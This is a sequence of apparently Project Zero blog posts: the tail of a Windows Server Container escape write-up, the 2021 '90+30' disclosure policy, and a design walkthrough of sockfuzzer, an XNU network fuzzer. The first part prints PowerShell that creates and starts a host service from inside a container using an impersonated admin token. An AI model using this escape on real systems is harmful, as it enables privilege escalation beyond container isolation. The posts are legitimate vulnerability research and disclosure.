PS> $scmΒ =Β $client.ROpenSCManagerW([NullString]::Value,Β `

Β [NullString]::Value, `

Β [NtApiDotNet.Win32.ServiceControlManagerAccessRights]::CreateService)

PS> $serviceΒ =Β $client.RCreateServiceW($scm.p3,Β "GreatEscape",Β "", `

Β [NtApiDotNet.Win32.ServiceAccessRights]::Start,Β 0x10,Β 0x3,Β 0,Β $cmd, `

Β [NullString]::Value,Β $null,Β $null,Β 0,Β [NullString]::Value,Β $null,Β 0)

PS> $client.RStartServiceW($service.p15,Β 0,Β $null)

For this code to work it’s expected you have an administrator token in the $tokenΒ variable to impersonate. Getting that token is left as an exercise for the reader. When you run it in a container the result should be the file hello.txtΒ written to the root of the host’s system drive.

Getting the Issues Fixed

I have some server silo escapes, now what? I would prefer to get them fixed, however as already mentioned MSRC servicing criteria pointed out that Windows Server Containers are not a supported security boundary.

I decided to report the registry symbolic link issue immediately, as I could argue that was something which would allow privilege escalation inside a container from a non-administrator. This would fit within the scope of a normal bug I’d find in Windows, it just required a special environment to function. This was issue 2120Β which was fixed in February 2021 as CVE-2021-24096. The fix was pretty straightforward, the call to PsIsCurrentThreadInServerSilo was removed as it was presumably redundant.

The issue with ContainerUserΒ having SeImpersonatePrivilegeΒ could be by design. I couldn’t find any official Microsoft or Docker documentation describing the behavior so I was wary of reporting it. That would be like reporting that a normal service account has the privilege, which is by design. So I held off on reporting this issue until I had a better understanding of the security expectations.

The situation with the other two silo escapes was more complicated as they explicitly crossed an undefended boundary. There was little point reporting them to Microsoft if they wouldn’t be fixed. There would be more value in publicly releasing the information so that any users of the containers could try and find mitigating controls, or stop using Windows Server Container for anything where untrusted code could ever run.

After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. This means that Daniel’s global symbolic link bug which kicked this all off still wouldn’t be eligible as it required SeTcbPrivilege which only administrators should be able to get. It might be fixed at some later point, but not as part of a bulletin.

I reported the three other issues (the ContainerUser issue was also considered to be in scope) as 2127, 2128Β and 2129. These were all fixed in March 2021 as CVE-2021-26891, CVE-2021-26865Β and CVE-2021-26864Β respectively.

Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.

Conclusions

The decision by Microsoft to not support Windows Server Containers as a security boundary looks to be a valid one, as there’s just so much attack surface here. While I managed to get four issues fixed I doubt that they’re the only ones which could be discovered and exploited. Ideally you should never run untrusted workloads in a Windows Server Container, but then it also probably shouldn’t provide remotely accessible services either. The only realistic use case for them is for internally visible services with little to no interactions with the rest of the world. The official guidance for GKE is to not use Windows Server Containers in hostile multi-tenancy scenarios. This is covered in the GKE documentation here.

Obviously, the recommended approach is to use Hyper-V isolation. That moves the needle and Hyper-V is at least a supported security boundary. However container escapes are still useful as getting full access to the hosting VM could be quite important in any successful escape. Not everyone can run Hyper-V though, which is why GKE isn't currently using it.

Policy and Disclosure: 2021 Edition

By: Ryan
15 April 2021 at 16:02

Posted by Tim Willis, Project Zero

At Project Zero, we spend a lot of time discussing and evaluating vulnerability disclosure policies and their consequences for users, vendors, fellow security researchers, and software security norms of the broader industry. We aim to be a vulnerability research team that benefits everyone, working across the entire ecosystem to help make 0-day hard.

Β 

We remain committed to adapting our policies and practices to best achieve our mission, Β demonstrating this commitment at the beginning of last year with our 2020 Policy and Disclosure Trial.

As part of our annual year-end review, we evaluated our policy goals, solicited input from those that receive most of our reports, and adjusted our approach for 2021.

Summary of changes for 2021

Starting today, we're changing our Disclosure Policy toΒ refocusΒ on reducing the time it takes for vulnerabilities to get fixed, improving the current industry benchmarks on disclosure timeframes, as well as changing when we release technical details.

The short version: Project Zero won't share technical details of a vulnerability for 30 days if a vendor patches it before the 90-dayΒ or 7-day deadline. The 30-day period is intended for user patch adoption.

The full list of changes for 2021:

2020 Trial ("Full 90")

2021 Trial ("90+30")

  1. Public disclosure occurs 90 days after an initial vulnerability report, regardless of when the bug is fixed. Technical details (initial report plus any additional work) are published on Day 90. A 14-day grace period* is allowed.
    Β Β Β Β Β Β Β Β 
    Earlier disclosure with mutual agreement.
  1. Disclosure deadline of 90 days. If an issue remains unpatched after 90 days, technical details are published immediately. If the issue is fixed within 90 days, technical details are published 30 days after the fix.Β A 14-day grace period* is allowed.
    Β Β Β Β Β Β Β Β 
    Earlier disclosure with mutual agreement.
  1. For vulnerabilities that were actively exploited in-the-wild against users, public disclosure occurred 7 days after the initial vulnerability report, regardless of when the bug is fixed.




    In-the wild vulnerabilities are not offered a grace period
    *

    Earlier disclosure with mutual agreement.
  1. Disclosure deadline of 7 days for issues that are being actively exploited in-the-wild against users. If an issue remains unpatched after 7 days, technical details are published immediately. If the issue is fixed within 7 days, technical details are published 30 days after the fix.

    Vendors can request a 3-day grace period* for in-the-wild bugs.

    Earlier disclosure with mutual agreement.
  1. Technical details are immediately published when a vulnerability is patched in the grace period*.

    (e.g. Patched on Day 100 in grace period, disclosure on Day 100)
  1. If a grace period* is granted, it uses up a portion of the 30-day patch adoption period.

    (e.g. Patched on Day 100 in grace period, disclosure on Day 120)

Elements of the 2020 trial that will carry over to 2021:

2020 Trial + 2021 Trial

1. Policy goals:

  • Faster patch development
  • Thorough patch development
  • Improved patch adoption

2. If Project Zero discovers a variant of a previously reported Project Zero bug, technical details of the variant will be added to the existing Project Zero report (which may be already public) and the report will not receive a new deadline.

3. If a 90-day deadline is missed, technical details are made public on Day 90, unless a grace period* is requested and confirmed prior to deadline expiry.

4. If a 7-day deadline is missed, technical details are made public on Day 7, unless a grace period* is requested and confirmed prior to deadline expiry.

* The grace period is an additional 14 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 90 days, but do expect it to be fixed within 104 days. Grace periods will not be granted for vulnerabilities that are expected to take longer than 104 days to fix. Β For vulnerabilities that are being actively exploited and reported under the 7 day deadline, the grace periodΒ is an additional 3 daysΒ that a vendor can request if they do not expect that a reported vulnerability will be fixed within 7 days, but do expect it to be fixed within 10 days.

Rationale on changes for 2021

As we discussed in last year's "Policy and Disclosure: 2020 Edition", our three vulnerability disclosure policy goals are:

  1. Faster patch development:Β shorten the time between a bug report and a fix being available for users.
  2. Thorough patch development: ensure that each fix is correct and comprehensive.
  3. Improved patch adoption: shorten the time between a patch being released and users installing it.

Our policy trial for 2020 aimed to balance all three of these goals, while keeping our policy consistent, simple, and fair. Vendors were given 90 days to work on the full cycle of patch development and patch adoption. The idea was if a vendor wanted more time for users to install a patch, they would prioritize shipping the fix earlier in the 90 day cycle rather than later.

In practice however, we didn'tΒ observe a significant shift in patch development timelines, and we continued to receive feedback from vendors that they were concerned about publicly releasing technical details about vulnerabilities and exploits before most users had installed the patch. In other words, the implied timeline for patch adoption wasn't clearly understood.

The goal of our 2021 policy update is to make the patch adoption timeline an explicit part of our vulnerability disclosure policy. Vendors will now have 90 days for patch development, and an additional 30 days for patch adoption.

This 90+30 policy gives vendors more time than our current policy, as jumping straight to a 60+30 policy (or similar) would likely be too abrupt and disruptive. Our preference is to choose a starting point that can be consistently met by most vendors, and then gradually lower both patch development and patch adoption timelines.

For example, based on our current data tracking vulnerability patch times, it's likely that we can move to a "84+28" model for 2022 (having deadlines evenly divisible by 7 significantly reduces the chance our deadlines fall on a weekend). Beyond that, we will keep a close eye on the data and continue to encourage innovation and investment in bug triage, patch development, testing, and update infrastructure.

Risk and benefits

Much of the debate around vulnerability disclosure is caught up on the issue of whether rapidly releasing technical details benefits attackers or defenders more. From our time in the defensive community, we've seen firsthand how the open and timely sharing of technical details helps protect users across the Internet. But we also have listened to the concerns from others around the much more visible "opportunistic" attacks that may come from quickly releasing technical details.

We continue to believe that the benefits to the defensive community of Project Zero's publications outweigh the risks of disclosure, but we're willing to incorporate feedback into our policy in the interests of getting the best possible results for user security. Security researchers need to be able to work closely with vendors and open source projects on a range of technical, process, and policy issues -- and heated discussions about the risk and benefits of technical vulnerability details or proof-of-concept exploits has been a significant roadblock.

While the 90+30 policy will be a slight regression from the perspective of rapidly releasing technical details, we're also signaling our intent to shorten our 90-day disclosure deadline in the near future. We anticipate slowly reducing time-to-patch and speeding upΒ patch adoption over the coming years until a steady state is reached.

Finally, we understand that this change will make it more difficult for the defensive community to quickly perform their own risk assessment, prioritize patch deployment, test patch efficacy, quickly find variants, deploy available mitigations, and develop detection signatures. We're always interested in hearing about Project Zero's publications being used for defensive purposes, and we encourage users to ask their vendors/suppliers for actionable technical details to be shared in security advisories.

Conclusion

Moving to a "90+30" model allows us to decouple time to patch from patch adoption time, reduceΒ the contentious debate around attacker/defender trade-offs and the sharing of technical details, while advocating to reduce the amount of time that end users are vulnerable to known attacks.

Disclosure policy is a complex topic with many trade-offsΒ to be made, and this wasn't an easy decision to make. We are optimistic that our 2021 policy and disclosure trial lays a good foundation for the future, and has a balance of incentives that will lead to positive improvements to user security.

Designing sockfuzzer, a network syscall fuzzer for XNU

By: Ryan
22 April 2021 at 18:05

Posted by Ned Williamson, Project Zero

Introduction

When I started my 20% project – an initiative where employees are allocated twenty-percent of their paid work time to pursue personal projects – Β with Project Zero, I wanted to see if I could apply the techniques I had learned fuzzing Chrome to XNU, the kernel used in iOS and macOS. My interest was sparked after learning some prominent members of the iOS research community believed the kernel was β€œfuzzed to death,” and my understanding was that most of the top researchers used auditing for vulnerability research. This meant finding new bugs with fuzzing would be meaningful in demonstrating the value of implementing newer fuzzing techniques. In this project, I pursued a somewhat unusual approach to fuzz XNU networking in userland by converting it into a library, β€œbooting” it in userspace and using my standard fuzzing workflow to discover vulnerabilities. Somewhat surprisingly, this worked well enough to reproduce some of my peers’ recent discoveries and report some of my own, one of which was a reliable privilege escalation from the app context, CVE-2019-8605, dubbed β€œSockPuppet.” I’m excited to open source this fuzzing project, β€œsockfuzzer,” for the community to learn from and adapt. In this post, we’ll do a deep dive into its design and implementation.

Attack Surface Review and Target Planning

Choosing Networking

We’re at the beginning of a multistageΒ project. I had enormous respect for the difficulty of the task ahead of me. I knew I would need to be careful investing time at each stage of the process, constantly looking for evidence that I needed to change direction. The first big decision was to decide what exactly we wantedΒ to target.

I started by downloading the XNU sourcesΒ and reviewing them, looking for areas that handled a lot of attacker-controlled input and seemed amenable to fuzzing – immediately the networking subsystem jumped out as worthy of research. I had just exploited a Chrome sandbox bug that leveraged collaboration between an exploited renderer process and a server working in concert. I recognized these attack surfaces’ power, where some security-critical code is β€œsandwiched” between two attacker-controlled entities. The Chrome browser process is prone to use after free vulnerabilities due to the difficulty of managing state for large APIs, and I suspected XNU would have the same issue. Networking features both parsing and state management. I figured that even if others had already fuzzed the parsers extensively, there could still be use after free vulnerabilities lying dormant.

I then proceeded to look at recent bug reports. Two bugs that caught my eye: the mptcp overflowΒ discovered by Ian Beer and the ICMP out of bounds writeΒ found by Kevin Backhouse. Both of these are somewhat β€œstraightforward” buffer overflows. The bugs’ simplicity hinted that kernel networking, even packet parsing, was sufficiently undertested. A fuzzer combining network syscalls and arbitrary remote packets should be large enough in scope to reproduce these issues and find new ones.

Digging deeper, I wanted to understand how to reach these bugs in practice. By cross-referencing the functions and setting kernel breakpoints in a VM, I managed to get a more concrete idea. Here’s the call stack for Ian’s MPTCP bug:

The buggy function in question is mptcp_usr_connectx. Moving up the call stack, we find the connectxΒ syscall, which we see in Ian’s original testcase. If we were to write a fuzzer to find this bug, how would we do it? Ultimately, whatever we do has to both find the bug and give us the information we need to reproduce it on the real kernel. Calling mptcp_usr_connectxΒ directly should surely find the bug, but this seems like the wrong idea because it takes a lot of arguments. Modeling a fuzzer well enough to call this function directly in a way representative of the real code is no easier than auditing the code in the first place, so we’ve not made things any easier by writing a targeted fuzzer. It’s also wasted effort to write a target for each function this small. On the other hand, the further up the call stack we go, the more complexity we may have to support and the less chance we have of landing on the bug. If I were trying to unit test the networking stack, I would probably avoid the syscall layer and call the intermediate helper functions as a middle ground. This is exactly what I tried in the first draft of the fuzzer; I used sock_socketΒ to create struct socket*Β objects to pass to connectitxΒ in the hopes that it would be easy to reproduce this bug while being high-enough level that this bug could plausibly have been discovered without knowing where to look for it. Surprisingly, after some experimentation, it turned out to be easier to simply call the syscalls directly (via connectx). This makes it easier to translate crashing inputs into programs to run against a real kernel since testcases map 1:1 to syscalls. We’ll see more details about this later.

We can’t test networking properly without accounting for packets. In this case, data comes from the hardware, not via syscalls from a user process. We’ll have to expose this functionality to our fuzzer. To figure out how to extend our framework to support random packet delivery, we can use our next example bug. Let’s take a look at the call stack for delivering a packet to trigger the ICMP bug reported by Kevin Backhouse:

To reach the buggy function, icmp_error, the call stack is deeper, and unlike with syscalls, it’s not immediately obvious which of these functions we should call to cover the relevant code. Starting from the very top of the call stack, we see that the crash occurred in a kernel thread running the dlil_input_thread_funcΒ function. DLIL stands for Data Link Interface Layer, a reference to the OSI model’s data link layer. Moving further down the stack, we see ether_inet_input, indicating an Ethernet packet (since I tested this issue using Ethernet). We finally make it down to the IP layer, where ip_dooptionsΒ signals an icmp_error. As an attacker, we probably don’t have a lot of control over the interface a user uses to receive our input, so we can rule out some of the uppermost layers. We also don’t want to deal with threads in our fuzzer, another design tradeoff we’ll describe in more detail later. proto_inputΒ and ip_proto_inputΒ don’t do much, so I decided that ip_protoΒ was where I would inject packets, simply by calling the function when I wanted to deliver a packet. After reviewing proto_register_input, I discovered another function called ip6_input, which was the entry point for the IPv6 code. Here’s the prototype for ip_input:

voidΒ ip_input(structΒ mbuf *m);


Mbufs are message buffers, a standard buffer format used in network stacks. They enable multiple small packets to be chained together through a linked list. So we just need to generate mbufs with random data before calling
ip_input.

I was surprised by how easy it was to work with the network stack compared to the syscall interface. `ip_input` and `ip6_input` pure functions that don’t require us to know any state to call them. But stepping back, it made more sense. Packet delivery is inherently a clean interface: our kernel has no idea what arbitrary packets may be coming in, so the interface takes a raw packet and then further down in the stack decides how to handle it. Many packets contain metadata that affect the kernel state once received. For example, TCP or UDP packets will be matched to an existing connection by their port number.

Most modern coverage guided fuzzers, including this LibFuzzer-based project, use a design inspired by AFL. When a test case with some known coverage is mutated and the mutant produces coverage that hasn’t been seen before, the mutant is added to the current corpus of inputs. It becomes available for further mutations to produce even deeper coverage. Lcamtuf, the author of AFL, has an excellent demonstration of how this algorithm created JPEGs using coverage feedbackΒ with no well-formed starting samples. In essence, most poorly-formed inputs are rejected early. When a mutated input passes a validation check, the input is saved. Then that input can be mutated until it manages to pass the second validation check, and so on. This hill climbing algorithmΒ has no problem generating dependent sequences of API calls, in this case to interleave syscalls with ip_inputΒ and ip6_input. Random syscalls can get the kernel into some state where it’s expecting a packet. Later, when libFuzzer guesses a packet that gets the kernel into some new state, the hill climbing algorithm will record a new test case when it sees new coverage. Dependent sequences of syscalls and packets are brute-forced in a linear fashion, one call at a time.

Designing for (Development) Speed

Now that we know where to attack this code base, it’s a matter of building out the fuzzing research platform. I like thinking of it this way because it emphasizes that this fuzzer is a powerful assistant to a researcher, but it can’t do all the work. Like any other test framework, it empowers the researcher to make hypotheses and run experiments over code that looks buggy. For the platform to be helpful, it needs to be comfortable and fun to work with and get out of the way.

When it comes to standard practice for kernel fuzzing, there’s a pretty simple spectrum for strategies. On one end, you fuzz self-contained functions that are security-critical, e.g., OSUnserializeBinary. These are easy to write and manage and are generally quite performant. On the other end, you have β€œend to end” kernel testing that performs random syscalls against a real kernel instance. These heavyweight fuzzers have the advantage of producing issues that you know are actionable right away, but setup and iterative development are slower. I wanted to try a hybrid approach that could preserve some of the benefits of each style. To do so, I would port the networking stack of XNU out of the kernel and into userland while preserving as much of the original code as possible. Kernel code can be surprisingly portable and amenable to unit testing, even when run outside its natural environment.

There has been a push to add more user-mode unit testing to Linux. If you look at the documentation for Linux’s KUnit project, there’s an excellent quote from Linus Torvalds: β€œβ€¦ a lot of people seem to think that performance is about doing the same thing, just doing it faster, and that is not true. That is not what performance is all about. If you can do something really fast, really well, people will start using it differently.” This statement echoes the experience I had writing targeted fuzzers for code in Chrome’s browser process. Due to extensive unit testing, Chrome code is already well-factored for fuzzing. In a day’s work, I could try out many iterations of a fuzz target and the edit/build/run cycle. I didn’t have a similar mechanism out of the box with XNU. In order to perform a unit test, I would need to rebuild the kernel. And despite XNU being considerably smaller than Chrome, incremental builds were slower due to the older kmk build system. I wanted to try bridging this gap for XNU.

Setting up the Scaffolding

β€œUnit” testing a kernel up through the syscall layer sounds like a big task, but it’s easier than you’d expect if you forgo some complexity. We’ll start by building all of the individual kernelΒ object files from source using the original build flags. But instead of linking everything together to produce the final kernel binary, we link in only the subset of objects containing code in our target attack surface. We then stub or fake the rest of the functionality. Thanks to the recon in the previous section, we already know which functions we want to call from our fuzzer. I used that information to prepare a minimal list of source objects to include in our userland port.

Before we dive in, let’s define the overall structure of the project as pictured below. There’s going to be a fuzz target implemented in C++ that translates fuzzed inputs into interactions with the userland XNU library. The target code, libxnu, exposes a few wrapper symbols for syscalls and ip_inputΒ as mentioned in the attack surface review section. The fuzz target also exposes its random sequence of bytes to kernel APIs such as copyinΒ or copyout, whose implementations have been replaced with fakes that use fuzzed input data.

To make development more manageable, I decided to create a new build system using CMake, as it supported Ninja for fast rebuilds. One drawback here is the original build system has to be run every time upstream is updated to deal with generated sources, but this is worth it to get a faster development loop. I captured all of the compiler invocations during a normal kernel build and used those to reconstruct the flags passed to build the various kernel subsystems. Here’s what that first pass looks like:

project(libxnu)

set(XNU_DEFINES

Β  Β  -DAPPLE

Β  Β  -DKERNEL

Β  Β  # ...

)

set(XNU_SOURCES

Β  Β  bsd/conf/param.c

Β  Β  bsd/kern/kern_asl.c

Β  Β  bsd/net/if.c

Β  Β  bsd/netinet/ip_input.c

Β  Β  # ...

)

add_library(xnu SHARED ${XNU_SOURCES}Β ${FUZZER_FILES}Β ${XNU_HEADERS})

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS}Β ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer PRIVATE ${FUZZER_CXX_FLAGS})


Of course, without the rest of the kernel, we see tons of missing symbols.

Β  "_zdestroy",Β referenced from:

Β  Β  Β  _if_clone_detach inΒ libxnu.a(if.c.o)

Β  "_zfree",Β referenced from:

Β  Β  Β  _kqueue_destroy inΒ libxnu.a(kern_event.c.o)

Β  Β  Β  _knote_free inΒ libxnu.a(kern_event.c.o)

Β  Β  Β  _kqworkloop_get_or_create inΒ libxnu.a(kern_event.c.o)

Β  Β  Β  _kev_delete inΒ libxnu.a(kern_event.c.o)

Β  Β  Β  _pipepair_alloc inΒ libxnu.a(sys_pipe.c.o)

Β  Β  Β  _pipepair_destroy_pipe inΒ libxnu.a(sys_pipe.c.o)

Β  Β  Β  _so_cache_timer inΒ libxnu.a(uipc_socket.c.o)

Β  Β  Β  ...

Β  "_zinit",Β referenced from:

Β  Β  Β  _knote_init inΒ libxnu.a(kern_event.c.o)

Β  Β  Β  _kern_event_init inΒ libxnu.a(kern_event.c.o)

Β  Β  Β  _pipeinit inΒ libxnu.a(sys_pipe.c.o)

Β  Β  Β  _socketinit inΒ libxnu.a(uipc_socket.c.o)

Β  Β  Β  _unp_init inΒ libxnu.a(uipc_usrreq.c.o)

Β  Β  Β  _cfil_init inΒ libxnu.a(content_filter.c.o)

Β  Β  Β  _tcp_init inΒ libxnu.a(tcp_subr.c.o)

Β  Β  Β  ...

Β  "_zone_change",Β referenced from:

Β  Β  Β  _knote_init inΒ libxnu.a(kern_event.c.o)

Β  Β  Β  _kern_event_init inΒ libxnu.a(kern_event.c.o)

Β  Β  Β  _socketinit inΒ libxnu.a(uipc_socket.c.o)

Β  Β  Β  _cfil_init inΒ libxnu.a(content_filter.c.o)

Β  Β  Β  _tcp_init inΒ libxnu.a(tcp_subr.c.o)

Β  Β  Β  _ifa_init inΒ libxnu.a(if.c.o)

Β  Β  Β  _if_clone_attach inΒ libxnu.a(if.c.o)

Β  Β  Β  ...

ld:Β symbol(s)Β notΒ found forΒ architecture x86_64

clang:Β error:Β linker command failed withΒ exitΒ code 1Β (useΒ -v to see invocation)

ninja:Β build stopped:Β subcommand failed.


To get our initial targeted fuzzer working, we can do a simple trick by linking against a file containing stubbed implementations of all of these. We take advantage of C’s weak type system here. For each function we need to implement, we can link an implementation
void func() { assert(false); }. The arguments passed to the function are simply ignored, and a crash will occur whenever the target code attempts to call it. This goal can be achieved with linker flags, but it was a simple enough solution that allowed me to get nice backtraces when I hit an unimplemented function.

// Unimplemented stub functions

// These should be replaced with real or mock impls.

#includeΒ <kern/assert.h>

#includeΒ <stdbool.h>

intΒ printf(constΒ char*Β format,Β ...);

voidΒ Assert(constΒ char*Β file,Β intΒ line,Β constΒ char*Β expression)Β {

Β  printf("%s: assert failed on line %d: %s\n",Β file,Β line,Β expression);

Β  __builtin_trap();

}

voidΒ IOBSDGetPlatformUUID()Β {Β assert(false);Β }

voidΒ IOMapperInsertPage()Β {Β assert(false);Β }

// ...


Then we just link this file into the XNU library we’re building by adding it to the source list:

set(XNU_SOURCES

Β  Β  bsd/conf/param.c

Β  Β  bsd/kern/kern_asl.c

Β  Β  # ...

Β  Β  fuzz/syscall_wrappers.c

Β  Β  fuzz/ioctl.c

Β  Β  fuzz/backend.c

Β  Β  fuzz/stubs.c

Β  Β  fuzz/fake_impls.c


As you can see, there are some other files I included in the XNU library that represent faked implementations and helper code to expose some internal kernel APIs. To make sure our fuzz target will call code in the linked library, and not some other host functions (syscalls) with a clashing name, we hide all of the symbols in
libxnuΒ by default and then expose a set of wrappers that call those functions on our behalf. I hide all the names by default using a CMake setting set_target_properties(xnu PROPERTIES C_VISIBILITY_PRESET hidden). Then we can link in a file (fuzz/syscall_wrappers.c) containing wrappers like the following:

__attribute__((visibility("default")))Β intΒ accept_wrapper(intΒ s,Β caddr_t name,

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  socklen_t*Β anamelen,

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  int*Β retval)Β {

Β  structΒ accept_args uap =Β {

Β  Β  Β  .s =Β s,

Β  Β  Β  .name =Β name,

Β  Β  Β  .anamelen =Β anamelen,

Β  };

Β  returnΒ accept(kernproc,Β &uap,Β retval);

}

Note the visibility attribute that explicitly exports the symbol from the library. Due to the simplicity of these wrappers I created a script to automate this called generate_fuzzer.py using syscalls.master.

With the stubs in place, we can start writing a fuzz target now and come back to deal with implementing them later. We will see a crash every time the target code attempts to use one of the functions we initially left out. Then we get to decide to either include the real implementation (and perhaps recursively require even more stubbed function implementations) or to fake the functionality.

A bonus of getting a build working with CMake was to create multiple targets with different instrumentation. Doing so allows me to generate coverage reports using clang-coverage:

target_compile_options(xnu-cov PRIVATE ${XNU_C_FLAGS}Β -DLIBXNU_BUILD=1Β -D_FORTIFY_SOURCE=0Β -fprofile-instr-generate -fcoverage-mapping)


With that, we just add a fuzz target file and a protobuf file to use with protobuf-mutator and we’re ready to get started:

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS}Β ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β PRIVATE -g

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β -std=c++11

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β -Werror

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β -Wno-address-of-packed-member

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β ${FUZZER_CXX_FLAGS})

if(APPLE)

target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS}Β xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES})

else()

target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS}Β xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES}Β pthread)

endif(APPLE)

Writing a Fuzz Target

At this point, we’ve assembled a chunk of XNU into a convenient library, but we still need to interact with it by writing a fuzz target. At first, I thought I might write many targets for different features, but I decided to write one monolithic target for this project. I’m sure fine-grained targets could do a better job for functionality that’s harder to fuzz, e.g., the TCP state machine, but we will stick to one for simplicity.

We’ll start by specifying an input grammar using protobuf, part of which is depicted below. This grammar is completely arbitrary and will be used by a corresponding C++ harness that we will write next. LibFuzzer has a plugin called libprotobuf-mutator that knows how to mutate protobuf messages. This will enable us to do grammar-based mutational fuzzing efficiently, while still leveraging coverage guided feedback. This is a very powerful combination.

message SocketΒ {

Β  required DomainΒ domain =Β 1;

Β  required SoTypeΒ so_type =Β 2;

Β  required ProtocolΒ protocol =Β 3;

Β  // TODO: options, e.g. SO_ACCEPTCONN

}

message CloseΒ {

Β  required FileDescriptorΒ fd =Β 1;

}

message SetSocketOptΒ {

Β  optional ProtocolΒ level =Β 1;

Β  optional SocketOptNameΒ name =Β 2;

Β  // TODO(nedwill): structure for val

Β  optional bytes val =Β 3;

Β  optional FileDescriptorΒ fd =Β 4;

}

message CommandΒ {

Β  oneof command {

Β  Β  PacketΒ ip_input =Β 1;

Β  Β  SetSocketOptΒ set_sock_opt =Β 2;

Β  Β  SocketΒ socket =Β 3;

Β  Β  CloseΒ close =Β 4;

Β  }

}

message SessionΒ {

Β  repeated CommandΒ commands =Β 1;

Β  required bytes data_provider =Β 2;

}

I left some TODO comments intact so you can see how the grammar can always be improved. As I’ve done in similar fuzzing projects, I have a top-level message called SessionΒ that encapsulates a single fuzzer iteration or test case. This session contains a sequence of β€œcommands” and a sequence of bytes that can be used when random, unstructured data is needed (e.g., when doing a copyin). Commands are syscalls or random packets, which in turn are their own messages that have associated data. For example, we might have a session that has a single Command message containing a β€œSocket” message. That Socket message has data associated with each argument to the syscall. In our C++-based target, it’s our job to translate messages of this custom specification into real syscalls and related API calls. We inform libprotobuf-mutator that our fuzz target expects to receive one β€œSession” message at a time via the macro DEFINE_BINARY_PROTO_FUZZER.

DEFINE_BINARY_PROTO_FUZZER(constΒ SessionΒ &session)Β {

// ...

Β  std::set<int>Β open_fds;

Β  forΒ (constΒ CommandΒ &command :Β session.commands())Β {

Β  Β  intΒ retval =Β 0;

Β  Β  switchΒ (command.command_case())Β {

Β  Β  Β  caseΒ Command::kSocket:Β {

Β  Β  Β  Β  intΒ fd =Β 0;

Β  Β  Β  Β  intΒ err =Β socket_wrapper(command.socket().domain(),

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β command.socket().so_type(),

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β command.socket().protocol(),Β &fd);

Β  Β  Β  Β  ifΒ (err ==Β 0)Β {

Β  Β  Β  Β  Β  // Make sure we're tracking fds properly.

Β  Β  Β  Β  Β  ifΒ (open_fds.find(fd)Β !=Β open_fds.end())Β {

Β  Β  Β  Β  Β  Β  printf("Found existing fd %d\n",Β fd);

Β  Β  Β  Β  Β  Β  assert(false);

Β  Β  Β  Β  Β  }

Β  Β  Β  Β  Β  open_fds.insert(fd);

Β  Β  Β  Β  }

Β  Β  Β  Β  break;

Β  Β  Β  }

Β  Β  Β  caseΒ Command::kClose:Β {

Β  Β  Β  Β  open_fds.erase(command.close().fd());

Β  Β  Β  Β  close_wrapper(command.close().fd(),Β nullptr);

Β  Β  Β  Β  break;

Β  Β  Β  }

Β  Β  Β  caseΒ Command::kSetSockOpt:Β {

Β  Β  Β  Β  intΒ s =Β command.set_sock_opt().fd();

Β  Β  Β  Β  intΒ level =Β command.set_sock_opt().level();

Β  Β  Β  Β  intΒ name =Β command.set_sock_opt().name();

Β  Β  Β  Β  size_t size =Β command.set_sock_opt().val().size();

Β  Β  Β  Β  std::unique_ptr<char[]>Β val(newΒ char[size]);

Β  Β  Β  Β  memcpy(val.get(),Β command.set_sock_opt().val().data(),Β size);

Β  Β  Β  Β  setsockopt_wrapper(s,Β level,Β name,Β val.get(),Β size,Β nullptr);

Β  Β  Β  Β  break;

Β  Β  Β  }

While syscalls are typically a straightforward translation of the protobuf message, other commands are more complex. In order to improve the structure of randomly generated packets, I added custom message types that I then converted into the relevant on-the-wire structure before passing it into ip_input. Here’s how this looks for TCP:

message PacketΒ {

Β  oneof packet {

Β  Β  TcpPacketΒ tcp_packet =Β 1;

Β  }

}

message TcpPacketΒ {

Β  required IpHdrΒ ip_hdr =Β 1;

Β  required TcpHdrΒ tcp_hdr =Β 2;

Β  optional bytes data =Β 3;

}

message IpHdrΒ {

Β  required uint32 ip_hl =Β 1;

Β  required IpVersionΒ ip_v =Β 2;

Β  required uint32 ip_tos =Β 3;

Β  required uint32 ip_len =Β 4;

Β  required uint32 ip_id =Β 5;

Β  required uint32 ip_off =Β 6;

Β  required uint32 ip_ttl =Β 7;

Β  required ProtocolΒ ip_p =Β 8;

Β  required InAddrΒ ip_src =Β 9;

Β  required InAddrΒ ip_dst =Β 10;

}

message TcpHdrΒ {

Β  required PortΒ th_sport =Β 1;

Β  required PortΒ th_dport =Β 2;

Β  required TcpSeqΒ th_seq =Β 3;

Β  required TcpSeqΒ th_ack =Β 4;

Β  required uint32 th_off =Β 5;

Β  repeated TcpFlagΒ th_flags =Β 6;

Β  required uint32 th_win =Β 7;

